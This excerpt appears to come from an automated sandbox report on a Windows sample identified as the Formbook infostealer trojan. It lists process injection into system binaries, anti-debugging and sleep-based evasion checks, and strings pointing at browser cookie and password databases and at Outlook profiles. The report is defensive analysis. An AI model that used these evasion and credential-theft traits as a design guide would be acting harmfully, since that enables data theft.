            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390CAAB6_2_0390CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390D8586_2_0390D858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03587E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0352B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 035BF290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03B37E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03B25130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03ADB970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03B6F290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: String function: 03B5EA12 appears 86 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: String function: 00445AE0 appears 65 times
            Source: fJD7ivEnzm.exe, 00000000.00000003.1791177055.000000000496D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs fJD7ivEnzm.exe
            Source: fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000047C3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs fJD7ivEnzm.exe
            Source: fJD7ivEnzm.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as above)
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@14/9
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe File created: C:\Users\user\AppData\Local\Temp\kinematical
            Source: fJD7ivEnzm.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: netbtugc.exe, 00000006.00000002.3639094585.00000000036B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_;
            Source: netbtugc.exe, 00000006.00000002.3639094585.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2284204913.00000000036E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: fJD7ivEnzm.exe ReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe File read: C:\Users\user\Desktop\fJD7ivEnzm.exe
            Source: unknown Process created: C:\Users\user\Desktop\fJD7ivEnzm.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\netbtugc.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: fJD7ivEnzm.exeStatic file information: File size 1393415 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IqZHJpXEsts.exe, 00000004.00000000.1922332064.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3638744641.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1998537625.0000000003902000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000006.00000002.3640439126.00000000040DC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000007.00000000.2067866976.0000000002D4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2390344641.000000002249C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1996320548.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1964838255.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, IqZHJpXEsts.exe, 00000004.00000002.3639292948.00000000014A8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: fJD7ivEnzm.exe | Static PE information: real checksum: 0xa961f should be: 0x160b2e
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00403060 push eax; ret 1_2_00403062
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004160FC push 00000030h; retf 1_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041789B push C5503231h; retf 1_2_004178A3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041613C push 00000030h; retf 1_2_00416149
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040D211 pushad ; ret 1_2_0040D212
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004132A3 push esi; ret 1_2_004132A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041136F push edi; retf 1_2_00411372
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417CFB push 789F05E2h; iretd 1_2_00417D02
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004135D8 push ds; retf 1_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004135E3 push ds; retf 1_2_004135F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00414594 push edi; retf 1_2_004145B7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E67B push ebp; retf 1_2_0041E67D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E61E push eax; retf 1_2_0041E647
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041E6DA pushad ; ret 1_2_0041E6DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004016F6 push ss; ret 1_2_00401859
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417FCB push edx; iretd 1_2_00417FCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00401FF6 push ecx; ret 1_2_00401FFF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035309AD push ecx; mov dword ptr [esp], ecx 1_2_035309B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03AB225F pushad ; ret 6_2_03AB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03AB27FA pushad ; ret 6_2_03AB27F9
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03AE09AD push ecx; mov dword ptr [esp], ecx 6_2_03AE09B6
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03AB283D push eax; iretd 6_2_03AB2858
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_03AB1368 push eax; iretd 6_2_03AB1369
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032EE30C push edi; retf 6_2_032EE30F
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032F0240 push esi; ret 6_2_032F0245
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_0330452B push ds; iretd 6_2_0330454B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032F0575 push ds; retf 6_2_032F058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032F0580 push ds; retf 6_2_032F058D
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032F4838 push C5503231h; retf 6_2_032F4840
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | API/Special instruction interceptor: Address: 4199AA4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exe | API/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 3770
            Source: C:\Windows\SysWOW64\netbtugc.exe | Window / User API: threadDelayed 6202
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-85135
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | API coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452 | Thread sleep count: 3770 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452 | Thread sleep time: -7540000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452 | Thread sleep count: 6202 > 30
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6452 | Thread sleep time: -12404000s >= -30000s
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe TID: 5228 | Thread sleep time: -65000s >= -30000s
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exe TID: 5228 | Thread sleep time: -39000s >= -30000s
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_032FC2C0 FindFirstFileW,FindNextFileW,FindClose, 6_2_032FC2C0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: IqZHJpXEsts.exe, 00000007.00000002.3639353647.0000000000EE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
            Source: firefox.exe, 00000008.00000002.2391720024.00000228E238C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: netbtugc.exe, 00000006.00000002.3639094585.000000000365E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | API call chain: ExitProcess graph end node graph_0-84822
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0357096E rdtsc 1_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004172B3 LdrLoadDll, 1_2_004172B3
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_041986D0 mov eax, dword ptr fs:[00000030h] 0_2_041986D0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_04199D10 mov eax, dword ptr fs:[00000030h] 0_2_04199D10
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe | Code function: 0_2_04199D70 mov eax, dword ptr fs:[00000030h] 0_2_04199D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov ecx, dword ptr fs:[00000030h] 1_2_035B035C
